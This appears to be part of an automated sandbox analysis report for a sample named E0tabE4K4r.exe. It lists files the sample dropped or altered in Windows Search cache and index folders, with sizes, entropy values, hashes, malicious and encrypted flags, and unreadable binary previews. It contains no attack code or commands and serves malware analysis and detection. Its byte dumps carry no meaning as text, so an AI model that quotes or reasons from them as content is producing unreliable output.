                                                                                                                                                  Preview:{.".Tp..8.,.. ..#..}.=../..... ....v...ep..o.u|3."[8..V..m....!..r.93.qA.N.7.......p..z.....<yy5.5.2..T....../ES.......y;..\..F.......c2D=&<........$...v.........M..-..$..DgN...E#'.y.bW.1..{..di{'.........'Z..@.....\..T...Xb.U..;.B.V..!..6s].i,.F...a9....%..v3?...S...`Zy.....|K..BX..n..P...lv5.7M.5.3NQTuLd.!.....FD.c...x.u$.l<.L..PB..TP..q...>.8..J?M............'!......j..J.....r...<ur.8..O..}..>.@E.p..v..p..F v....i.([`0...\.F.k.../..<S...QW.5.....7..DJ.g..U.yY k0.$i0..e.#.U<..#....GmN..:..C.zf...'.....-.#0...o.....H..{<z.D....<.,R.).2R.........3b..i...1..^8..g|F..0;..J..G.M...\j...}F...%E.n.?r.PQ.s.aw...'A..0y...~...w4._.r..ud.52+).(.":6..L.R.8....u.......s].~...U.e.FT..rh[.&.......z0.....MX...b4....j.._.......n8.e@...y&E.[......kl.v^....}...&q B....@e..O=!.Aw.....z%r.....B.8..(i=.MV ......nP~._.......+s\......(G..^C<.4..e./=r...nA..'+.R..,..V..?..9.........2...I..8k.W...._./.4C.".R....T!JAI$V/j......)..\/9)..;.]..%.84.I..kr.B..E......Z ...z..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573198
                                                                                                                                                  Entropy (8bit):1.3187187189292606
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:hLU5hDD+4gd8GDSw9eXBL5T8F0CawmfX4by+SospOx0iNrPAyJPXs2O/x9UJg0Ib:+9arrDVexL5TG2Z4byWvRlPc2OJiW0s
                                                                                                                                                  MD5:8BF9376458E8624FB64A79C321AC159E
                                                                                                                                                  SHA1:D581770851C19C57561498581454463EC4835B8A
                                                                                                                                                  SHA-256:8BED95E43BF79BD73ABA97F2C4019C9B552F3D79BBD6A45022AB88F6D49068C8
                                                                                                                                                  SHA-512:ED057332D650DCC97992CE33F916C8590174C348B290B5EED16D2BE26863E2A3AAF093073DEA0CBCB5F460DC92F1E0CA667C67824ABEAB5402B4C0D63FAFE1F6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.8./.Z....?>].M.~.....Wy...{S."..[Z.(.9mwZ..i....~....&...^.k......r.".G.._.....h.D:...s..G..&.......w..uMvKg..f....;..I.....6..oC..U..g'_...cK...R....it.....8..m..\.-.&o.c.@.E.2.A.....-Y.......`...5..8>D.e$.. .!].....f........R.z..Q..Ei..s..qW...Q.x.g.@M...?[...8W..|.8p....f.).R..lM......K 6l.....$Ew..bM.4.S....Z..=e...e;a......D........Q..BSj..5LsnD.....k...+f.J+.:...pU.#.an...h..<.O.*..8...5..a#..h.U.{.....IpB...b{).Z...G...]k9%(.4...9..?..sR......+6...[H.D}.!..gU.U..z...5*...[\.l{>g..^.Y..^&s..........?..tT9.e.5..!.j.q+..*F..z..Tc.r..6...+<. Y...cy.s.#......G.x.%...j...4..WQ..4....f_E.!X..F...h..C(1d.,..vTv...4c..T!7W...E...S......Q9...K...].d..g.(.;....d....pG...8...9v..[..B9(.m....L....6..FZM]....j:o..........].........C.R/@?J...f.g..B...~...r......I...y.............Gq.p......9....m..p.]sI..{.b_4;.|-.........j.W.kK.,...w.... G.+h.I..j.JV..ODow...}~).y.PS%M....aD.6.#4L..z/........gP$......D.e.'&aX(....W(...^...[i=|.E2.I....!

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.985986229729589
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:kghKVF6kdPvARK5tB69ZmgezKt/c1wcPYxGE:MVAkdPvKK6mpsk1LqGE
                                                                                                                                                  MD5:3B67F40A290EE9C8E26290E8BF49DE58
                                                                                                                                                  SHA1:20A41F997B607C5CE27B9497FF57BBD4E42A6DB9
                                                                                                                                                  SHA-256:F37F1E436FED2D3825D0DDB3C123852115421B298E3E425083CC38D6F60B1BC7
                                                                                                                                                  SHA-512:78271CE6F29DD81B77927A9F9BF5D831990B44DF516F486565B52E7C35DE70EF0F2322C578B52076E7157211EE5EDDE2741A37E5858A0577D4FBEE5B9E072EC5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:9.....X."U..^8.......gQn....9..]..~..Pze&...Z...=.`.?....RU)..d.H..0/@L.N.../......c_Q..ry?.]..dH_.......M.m.V..........[R......'H.._1...|Bi]..<G._?-7.G....+.D.9........x[K..$,!.Z....2......@.(.....;.n._....r..hN..op.?D......%.O.b=6LV.........).2.5..,."?.vq.."...v.j..-Q...;6P...R.$...,.F....+...pj...\..Q..&.W.4.oX.....:..(.F.9(G.S...G.]tV.^........{.i4Q.wS.(6...C.pb....G..n...M...q...6..F...S(Xx....q...}...$.=~.l...l.S.'..k..).`I.Z:5qJ&...b....|.8..%.i...W.#.....*|..A....6..$>.eQ......vb..g......(P*.:m........2......o...K..K.Ps.t.......p.8..G?,j.....j...h.D..U.{..LaB........".9.\.~..l......o.....y........!......r..g.9..G..1t.}....c-....f5...p......s.r;..^..f.K3.(L..(lo......&].u..W..[...`./s..xG...Nyr.. ....3Yw.8...O1.+.iq...3*.xD.'.[.dl'...!.H^gC..;.$....1.`.4.p....;_.r...$S.A.?.s.i)..J...0H..T.....\.LR.2.P-<..3.i..2.w'.......'.f[..G....J_(kH.5....V...........0.4.Vom.........*..../vz..\+.d...Z.;$..R...D.E...Z...!...e=.w..#.g...!....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2097486
                                                                                                                                                  Entropy (8bit):1.0847776237313012
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:RiQMHEKR02tHGn74C3n2jwB7RfLftmUUDbDpMNSBXmd2K6ZqeD7gWXvH0jaxwuah:EQq03/fDCxZmdArXvEB
                                                                                                                                                  MD5:8EB07D8B5B8BE4C2FE8C9EBB9F608666
                                                                                                                                                  SHA1:6A24890D055E8ADFA7B3B72FCA5768E6823DA3AB
                                                                                                                                                  SHA-256:EEAB520C564EDDB62F87B8E693BEAB02B6F63EFC515B9369ED6D122AD95363FB
                                                                                                                                                  SHA-512:FD09892E44A101FEDF23205801E87AFB9EC2B59B2E7E6E1F0AC24D6AF3CE30D23C29FCFB8F4D5A5977C755A3F072420986D95C9F15D8D3A29087A6EBC2D1E23A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:'...#......J.)..:..}&ms.....[.j8..G"...i.AY..Wd...a.".3..}.@.h.-..,CT.O..<...5....Q...e...3..F.9.;.=.b.n...u,.j..v....2..-..=+.....O.6...F"H.[..j...*@.\;}.`..e.W.QI.nw......<..X....y...m.fk.Y....c.Jo..N?..;!A3.W*kj!.+l%..|D/...D.f....._..6.[..F)7z.|.....)lkWE...:.Y..y....<{....1.. )+Jz..}..1,Y8k.p.......=.......'.C...'}K.4.-I..!.._2..o4pM......+....1d...0..2..&......aq....$.Zm."............{...?.,.p3...#D.).b..b.:1.....c.....u..{....1_..J.3...R.v....K^..w./.V.....;....2g....x.....A&._...Y.+.7.F64\)...M.rZ9...|...+3#..d.3z.lYg....t...N...& .`.V......_......{=.p`..E..X.w.|69H...|...&.Os...Wo........Y.ed9.;J.r..P..M<....Fi.[(.4...R...lXf+A..[...e).....@8>v...d..|9...g.f.x. {..b%5g..0.R.....`.BO~..v..^.._..4.4.m..jp..@....."..0....6Xj..\u)NC...e......Av..t........t..a....m..B.........3.hY?....7....|.7H.n..c.$0xd.O..a...!.5.. i3ei&w&....s.-.>....4Ig..Qd2..5Z...d.Jh=.,...W}.:(.....".z....n.Kt..-..~....!......L<.b.m.....6..Zb....S.q~.S...7

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.9881938618893775
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:rFRm0m9dsUSO6+X8NmckoTM2J8A7NE/SxS1DH91cBvcvQE:rFU0m9YzNmkGmE/S81DlR
                                                                                                                                                  MD5:513770EE1848B093C0A591E7DA5656E5
                                                                                                                                                  SHA1:FCA489441B89C1275EB557CF0334B379AB7F7B47
                                                                                                                                                  SHA-256:9464C9FBDE8CA197E17E68A8EA163899BE28F188B3550C972B20D74E394A96F5
                                                                                                                                                  SHA-512:77390E40FE976560E2BE2BAA2E47EA020E2833E0C253806957FE5A3ACBD008BDBB707DDFC646CACD16A1E85F2DB2B15C6C92F2F9A472F7E3109E386526224747
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:^...{.@.7..K..At..t3+.....4.'.:.oO..i..3....a..Ju..%....1.....O!g ...\.k.o.q.......v.9.SV.y_.}.^...R9.T....LQ?H!...CE...L.=eh..Am.)G..L.g.W.2YRo..J.........0...\.t.2~..^!...&f..l../;X..9"......F.r...&4.Rk.!;......IB]........a]|...D.4J.H..@.I8...J.......E..\.`>$.f..n.....[.(..cs...C~......y...0...#m.3...`....y(...q..o.....Z...XQ...'../6+....B3.,..2(....=..N........!..l1.....L....`w$.x..=....]...h:*..16Y..1_.Jp...x....=..g.{.j..-....$..`.J.:6.]G....[Nx.'.m...!.i..}....W......[....`.....$.....tgy.)..q...l...<..)..v...<..%...}..XF.....K.y.;.B..N.+L..#!c.M...m"=s.+.gl....}.<.kV(tZj...d0...&=Us7..=...(H...m`Ou%.w[.K.....l/c..E.....>......9Z..\.^j.....&..Y.6....SEc....i.0...X....wZ...-.\..Z..g20!4....8.6....E.x...J./(.;K8.nXM.CC..W.2)....{.:........{...`..d........+.WF.0...\..0.l..e-!...jP@..n....@C.+.:......r.\.H.TBh.'....R..-...A..`..N+Z.J..#..,~.?....F......V......s~...{.w._.*w.*[.....o`.0......rw`W4..fB[&T.7C..@...!..}...&..D..!..c.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.chk

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.974833138608335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:M6qQscpvV9P0VaAcGj7UCGPazUnUm674VDE/7jB5isburZUjOu2jeO:M6qJcpt9PfAcGECnIX6+DqJ5arZUj2l
                                                                                                                                                  MD5:926646D17F9FDC8DF2931D633C88E60A
                                                                                                                                                  SHA1:6AFCB092F3D784DD2C0D19557B54707693CA90BB
                                                                                                                                                  SHA-256:FEE7A4A72005782F06906D1021E230F96193C6C8C91489DAB30CA23EDBD27B53
                                                                                                                                                  SHA-512:A53F7F249E6E0043A753F42F58379FD5B2FDAA1380A654DBF0F4C32956F588606DB20B4E9870262FBA7AF3BC4262A3DA36A01B9D75D0A1E498CB76556ACA9E11
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....M..}5...7...n.$....qq/.....g.$ar..D...p=.p../E.i...E..*..\h......J~`..=Z.,..e.m.9e.#..si<.6&..}..G....=....I.I.......D....p..DbDm"..*D..1.z.....L..&.^F..jug....L../m....=...r.....R.|.@.c8....is.AZi.u[<.....h2.V.#. .j#.........8B...V..j......%O.Qs..8.......'_qq.....YH3...I.Z..x......Mt.\s.I......h.......w.$..PRe.....0.T.......o..;....q;..sW.#O...J.........B...+......9....S..[C.b...w&Nhb.(}Hq.7.&.E4.7G..G..$.....U_;7z.5.......:F.v..?C&"..+.E..P.....R.+Y.4..UM.......RK.,{Sc...n....r9.+..U.?U.z.../..@..(CT.Z.E.E'A......i~..s.Mf>.P(lq.@....<.vk.`...}...U^G.?...#3U}.......e...fx=..4n....`.|..N.=L.g...i..2....c..Zg%.~.c..a......(.6..2....)6..'v9yAA.../....)z.F......r.6YO..+.2s...`.u.a)..Xn......,n.2.s...4.'J...ui.^%Gi,.O.V.r......@.........E[z....=X.z.o........}.;.a3c..<...8.....M....<i.b....K...%.;....q...O..^w*c.[JD.m.S"jS..F...xj+.TV.xz.e..K......G>..n...r......W.7.=....v:..qK....bLg....r;..T../u...I....'.5.}....S<M...a...(#...e

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.232992740714113
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:FoLACfJMRSI6gMjhn767b2pPiHmMDiz47Fr3WEPMTLq:FoLbJMRS3UbGiHvizIr50Xq
                                                                                                                                                  MD5:5FCCB0400204C9145655015C39F9A406
                                                                                                                                                  SHA1:44315019E52437697B9C24AFE2604726AE0B9E43
                                                                                                                                                  SHA-256:1E784A793AB9425A107753CA3509F3B229E6D2B07576302F8C6CB019A1840B51
                                                                                                                                                  SHA-512:47D035BF2029D1368FBD4B29A02625B3426A788C3A89D648707A72C3F6F2D1F2E625C4AB2821D68378F66D4E1D09B334AA3DBF73D10DA5328081D971BC1480FC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.........N..*.]AC..2......].R...j........U][.sj.....1.._.2o>.s..en.<2.,.QG...1*.%~....(8C...Hgb..`'.x,v6F.Z......^W......H.U..K.._../.....\.C...........*...*a...mqc.t..]#.:.0..x(...... ..y.'.T.t%..qlv...p.. ;...}.!.qg.E...\Q&...5."M.....O.....HjJ.dV...B..>E...`.x..W.....n..@.'m..g.Y... ....F.l...G..(...V.@...J>'..a..;..W.6I.Z)...*...Z}.c6..-.4..v`...M.Yt;..o...k..;#.=....5.b.@_ s.*...!s...2.m..n..iFw..F...........*..QH...-q.....`WDI....H.@.:..]h-..9....g.F...9.ab..Pe...+.Y.<.^..x.=.....R.u.~...Z.}.H.OH._%.&.n..:..#........`D.DU........d..%..-89.....+...S~.A...A8#*ch....[Y....s.hA.ysO.......x..9`..!....B....G.o"[.R)u..7...f...mZ.....N. ...*..)nD(.u...K@...0/m.;#.........vD+....v4[........zt...g..........b..$.kC.\.h..o]...f.6.x......i........pwO.w.s..CVeLovy%.V.[..el{.~.oo...J'e....]..6...q.P*..z.<.u..M.;K..`I.......s....$.1.V.V..e.~m.. .....K05../.K,..iZ..S....(..<c"...a.J..Q....0..iv....J..Za.o.\.rR .qy......y.r:6.......1%...R.U..........N..z.I

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.2081435163454644
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:Nm3KXPFKOsaooHo4KtnzJTk06SxHLqq8n2UGzcPqFCt9:c3KX9KODI4GnziRcLn8nXGzciFO9
                                                                                                                                                  MD5:483AD581BC6331DDE92800F45E9C3D21
                                                                                                                                                  SHA1:7933CCB0ECC07D024EC05F38BE90DC963BD83473
                                                                                                                                                  SHA-256:933266C170A999F825D3857632B52C7F464205545D79997A0C12725DF9805B38
                                                                                                                                                  SHA-512:760B95A53672CEB50A56402DEE643912021653CC6FF60ED294DF30CBDD509148C37B1F45F5724B90F5CC8D1B4AE05B3E9D7CED83DA636F47DE5C739DD81C1ECE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....@.........)r..d...n.Z.`#4Te.*u.F'...... .3.".O.".5~e.tj.`..KT....l...I...5.Gx..R.O.x#_F..m3.EEB....(...1+MQr.K...~*1.......ci%..<<X'....&.k8..z..^...-.h.e.66........a.........>.1....q.=L#RO#..sb.Zq.......AK.'.....`w.26.........Us..om......&3.8..G..E>\L..2/.]..I.@...l.%....%.yu.)...d..w`..C...l..g.`...S{6..........\S|..%]../..#.......O.A..#.8..Z...xFZ.I...e.8+...Z...;...E..7.t ..}%z.t.(`. ..d...J.>.60.J>.h5C.....$A1..,t...P.V..S.2.$?..].l...^+..%....9Y.>T../..;M.P.......i.;.Qoc@...Md......e..w.H1hE.c.....z...WN..>.N.....9.2...*...W9.........Z.... .O.o..V......H..^..9R.u..Q...E..:.7..J......*..dM..,{h......;.........5..C....a|D..|..8. .]........(..so..n......$..6.l.._...j.m...f.......ZO(.E..~..z...U@;;0.0Bk...0..a...Y.w...Y...|.....*.y..Pb.M...N...v..Y..$W...u.1..a.%H.ua{.K(;u..rL.y....c...g..F.=.V.Q.E.k,..0..2.x..H0N.7x..Q.....().^L(m..p.!..m.C%....ep..~H6Y.N......mC\.=.....P..O.Beh.+...kx....k.n..4.v./.Fh.+.9..6.Y..5.D.pv..n

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.207972075057583
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:j2Y8Ub1VBhXIOCPH1Eu+uVnYTCSjcpvr+/CuhTy1D8x7Pc1VWfRZjgtn:j2Y8UrJCPb+xTzIc/zxE6RZi
                                                                                                                                                  MD5:F796C908C1010CEF3992BFD7B3A6C0D1
                                                                                                                                                  SHA1:29545707B6C3FF20D4AE3A2B813ADC9F7FDA3D8A
                                                                                                                                                  SHA-256:76DE66168F8CDB89BA3CADBA5756F4E84F92E4418A34D17A608EAE08A86A9D1C
                                                                                                                                                  SHA-512:7C6CF4D9002C205B44B5FAA8C2CC0D338BE47D25584DE8A3608B03E8A678A4C8712D7867996310C488AA2D9A4D13EB8260561FF238220199F5A00B25E1713624
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......U...9..WY.:.?...Y..J..aZ...1.A.B.Z8.az.Ia.+.9k.......k...=..i/X.$.6c5.tj.p. +..T.K....}^....w..9....`y..9P~..Ory.........8^.|...BpP..._.PA...Z[t.6...v!W..'ni^..R....4.....f':.......P^..J........d/....//.?..Y...............!:.\..k..nFN...?......y..0sI.\...@...r.&..... ....V~em.g..?..C3<=4.=....}...(.a:...K..NeJ.,'..T..'.{...A...0.kt]e.(...[..#..Y..CC..]..jgXO.0..Y.(.i).Dd\....{..w.8v.u.W.,...U.2/.%....Y.1.g@..Z..I.1w.<u./....).z.g%...2...b........qc......iU`.9.{b.G?.r!..#.....%.I.6....#..)E..z2........h....)U&..gQ|..kK.g..a..q.u.../P..Cg2...&.Uq|.wfk.....r..n...mo..$.B.'.{...VJW8....Y..\._..o<.E.5*.T|3#..Cc&...kS...M.0)'..)...U..'.d..1.t.l.t,...-..B...}......]d@......k"...;...&...#.H..i.*.`.L6[.q.=........./9.A....\VY..}7..z..Q6.H.u..!......P...h.!.&.r..........y*..x.g.H..,..;t..@a.m...v!.|o......x.`.W..&..8a..:eq....yg?...Z"L...Y>..$....=..^#...t.]....mYh..>U.......Y(-.........NBA.;.q.yj........n.R>.'.}P...Y....>..`.h.I.a.<....V.U....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.207994603718176
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:VNeoSs1Ryj9lBU7DkQzyK5/jwlEcPM3W+:VgFsbM6HkQyVEcT+
                                                                                                                                                  MD5:C914F7FBD0C8FD88792B81C5DD4F54F6
                                                                                                                                                  SHA1:6267D8EC939B688CC3EEE1AC3DEA6F419EDE1B16
                                                                                                                                                  SHA-256:2F4FBE596D9B85EFBFF952775F9677DA6B04D2EEDA9656CF822909EA52DB7400
                                                                                                                                                  SHA-512:D8CAC2218E75F0433E020D113FF9F13294FEC45C42E9AE9E459BC1209AC7DFB1CF89A78B3E4DABAF401526D0A39D384F500BF361A9B9AFEA4D466415B5ABBABA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......&..8...q.S*#.].....S.j~./t.....&.5...._.#.^.(...T:.RN.t."../..d.k....2V......V.42.....B6n.F..T...`L/.....n8.......wW...G...,t.{....H..l..T..^Kn..B.L""Q.h..D..;..y.....C..Y.ia6... ....|.9v..k..........\b".^80.b.L....dH.$1...S*. ..r'..#.5.M.`.O3.;.8b.].}\....-./.W*.[....mas...~.-|I............h..W..>_.sp....lk...Dm........jJzn.1.?.[...6.=C.....V...4..-..<+..#.g..8E_3.....H&..R....T..h...j.Qss...B.0.*..HNm......<J....b<sup-....n...._6CAX......F...2...p..rc..o.@....N...V...b:..@...L.w.v`6/..@.>.......p...0.`.;O..PS....F.T....W...7....0..&...aJ....U.?.o.01..ZW.../.a.7......cFp...t....U.L..._../.|........P..7...fX.. ...p......S....E...o.@+....Yd..We..f...D.sX.n...:B.[.....c.-pn ...U.w"**.t...........G.x.)9.....}hz.\0.gHXh..,.f.....f_t...$.......[....Y.NK.Tt.!..v5N&js... .d....G.k...?M....Z...b,.-M..b..+b8.....v....6]..5.....LX...1..W+H.2.I.vnK.&...Q.....<..A8ZW.F....,l..N.Q......>~.0.6..+{.C.WW(....G..v....v...}..O..)Q.5...H.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{326d5ea1-32a9-48c1-a274-b0b6c14dea72}\0.0.filtertrie.intermediate.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):37506
                                                                                                                                                  Entropy (8bit):7.994694116590516
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:XpnNeu7skzfxkZ888dHP7i1IoqSCE6ZLvYEBS9ApcA0GUmaHFAbTCj:tMfkjaZ8HdHPYqNE6p3BAAuA4XHqC
                                                                                                                                                  MD5:A9A353D7A8EDB96608667C3EB5E7D1B4
                                                                                                                                                  SHA1:402975647F8283FC1D367C78DB65CB10ACDB0393
                                                                                                                                                  SHA-256:DD8E3F3ED0DD5110A9836B0FB917CCA426979CD7F10DA6451DA695E216C865A5
                                                                                                                                                  SHA-512:7DFCAB4944499EDB35BFFB878F0210F6B701F6E300BFD152A996BA5219091C77C105BAE953F0E814D4CC64C7CDF024A73C3A2F3BEF2D0344035C3995938D7A25
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:0.0....^..f.]d.....l.`....%<"s.S.....P;x.h.^.v.....y..H.7n.......z%iwI..8...P....V\.;..p...T...v.{.1.w..qy;Y6N$a1.L.[.;N...d..D_.W-..Z#. .o..3..W.......l....b.0.5/.Ju..~.rA.^...c.6.LXzf.D$.We~..;*..6..,.E....2.[.##5...kXS....s...>...*HbYf4i.{..d..z..l........ze...,..)...qB+...r...+n".H.M....L.97..y .. .Nx.)W(v.X...?....t.2....V.md./..,...........i..G.5....U.[.pS.}..k..u#..t=...u.l..*9.P.7*."....R...:..Ot.......O..[.*.8.nQwOU...^.!..)"3.....e.bD...Kj.v.)n.1f6sH.y5.?..YsC...3.8.T.....a...J#]..t+tK%..$....zgK.[....&.E....).@...+d..6..+kNw._fD.:..G&..'..y.<..f.#.V.,/.#2.7.'..b..m.Z.~`>"...Y.#>....j.z2....EJ\...y...9x.F..z.a.u0L.vKa.5..ZegC...e.../w.O/Wpl._....$,]o..]..v\#...7.,.Y...@.....6*.*..U.0....H.#...*..-...t..q......V.8....TK..oO...o#1Q....j&R#".W.WT_.....x...9'r.i[e.`.Rpx.x.GD'..1...V.|#,qJ..4..@J..!d.......`..a[.0...i"D.\R.z.le.<g..J0..e.au.*!....[dFI.N...f....[..b..Pl^.5'.M.....t.$8..R.iU..+..2.......VOj.2..2Uq#.l.(....yn.....`.9.....7...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{326d5ea1-32a9-48c1-a274-b0b6c14dea72}\Apps.ft

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):50409
                                                                                                                                                  Entropy (8bit):7.996343580983326
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:xG0vLVlTg8G9C5LC7QYfTrkF8tbPxFXWVq8Z:bvD08GUyQYfH2IWVq8Z
                                                                                                                                                  MD5:9C9C6525D037A4733FF0D8F969DAAE7C
                                                                                                                                                  SHA1:EE6AF3F75DEA93DDCF3A0B846AEC295F738BAC52
                                                                                                                                                  SHA-256:2236DDB9F4283DA0FE35413CC170C3AD1A7ACCFB8496FF3EC683A312526DF3E2
                                                                                                                                                  SHA-512:6C18756D0D8858305396C98EA206933D6657E6F8509F17E4C12D82091D0AFBC0CA3E1BDA7AD00D2CF9893172D42799F3D7DB8C5F09653B43184981646F8AA130
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:........h.7..r...rM......4#{Z.K..;Z...5...n.....F..9Pflw.J._...,.M?*R...^...[.S.......K.+@.4.,.`....YeY.,.....Y..O...%.....|q*$s..I.fG.7.J./.~m.H..$.....V.9+.-.....a.}v..(...A...n.-WQg..y.e.v.P......N..SMM..GIv<..*R.....B...... id.Y..........wc..E...H..nf.......;.Zp...9ql...z%.....;U.. ..{..M..J...._.1#..=..b....).<.v.#>.....7...2?.3v..B.H.0|.B..n,-|}-`=..Z......].x.>/...f.p{.hgX.<.~ZBR!V.iQ.._.B.n..![.v......C..i...wS.$j...a./.....z.....x.....(....@x.i.m.'[..)...Z.O..m..{F...d..MK.E......&m.p`....B...Z.7y.1.lGp...,.5.b..*W.H.W.....:........'..f........+!.g...dv..H.EgV`vy..._S..i..k...&.....m.....%?kP..js^-.B.<.@.Ct...V....S.o.....n1l.Gz.jkP........p....UV2..g....~...../aa@.....$.-l.(....)c.A........X./...a.":O...Z...2.+...)/..C......K.w..0...l..j.i&.*....\&.....P.......N.g.|c.}G..Ak:8."...&....O)o.4&.....t;+.{.xi.Y......QV+.E.B=..Ns..3.<.....i...!{.ZMZ..7.!q..f...b...P=J..=....N@+..76..:...F.7....N..N..i._...N.....%.....C.........

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{326d5ea1-32a9-48c1-a274-b0b6c14dea72}\Apps.index

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1124830
                                                                                                                                                  Entropy (8bit):6.544431000037303
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:pK1r6gYfoyFxz8GfoLr7YfoyFxz8GnjPjl:kgjf1xz8GfMwf1xz8GjZ
                                                                                                                                                  MD5:A928138D454BC8FC70273C4D0CCF173E
                                                                                                                                                  SHA1:09411FBB57FFC83CAAF390F38449A6D57762C36A
                                                                                                                                                  SHA-256:A4875BBED461798DD040280FB4B5A8B5D3FEDA09323FD0DEB5D49FFC8C3BB821
                                                                                                                                                  SHA-512:44AF0795AA8C4962980E88E506D4BAD1D65435DC24F638E1414866443347A82BBC2550FFCEFA032649009BFE86943106674446C7056097F7B26E940E2D3647FC
                                                                                                                                                  Malicious:false
